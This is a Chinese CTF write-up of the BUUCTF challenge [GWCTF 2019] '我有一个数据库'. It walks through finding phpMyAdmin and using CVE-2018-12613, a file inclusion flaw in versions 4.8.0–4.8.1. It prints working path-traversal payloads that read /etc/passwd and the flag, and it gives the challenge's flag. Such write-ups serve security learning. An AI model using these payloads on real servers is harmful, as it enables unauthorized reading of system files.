栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 前沿技术 > 大数据 > 大数据系统

BUUCTF[GWCTF 2019]我有一个数据库

BUUCTF[GWCTF 2019]我有一个数据库

文章目录
  • 题目
  • 解答
  • 漏洞分析
  • 知识点

题目

链接:https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93

解答

1、乱码,看不懂

2、F12

同时结合题目可能与数据库有关

3、可以尝试扫描相关数据库的端口是否开放,也可以通过数据库工具进行连接测试,但是这里使用的是phpmyadmin

随便翻阅了一下,得不到有用的东西,也证实了上面什么都没有的说法

4、从版本入手

如果不是很清楚,可以百度一下,这个版本的phpmyadmin存在后台任意文件包含漏洞

5、根据此漏洞查找相关的payload

?target=db_datadict.php%253f/../../../../../../../../etc/passwd

?target=db_datadict.php%253f/../../../../../../../../flag


得到flag{a955c3dc-91be-4a45-85ef-5af02da42313}

漏洞分析

见链接:https://www.cnblogs.com/xhds/p/12579041.html
https://blog.csdn.net/xuandao_ahfengren/article/details/106688367

知识点

cve-2018-12613-PhpMyadmin后台文件包含
影响版本:4.8.0——4.8.1
payload:/phpmyadmin/?target=db_datadict.php%253f/…/…/…/…/…/…/…/…/etc/passwd

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/320989.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号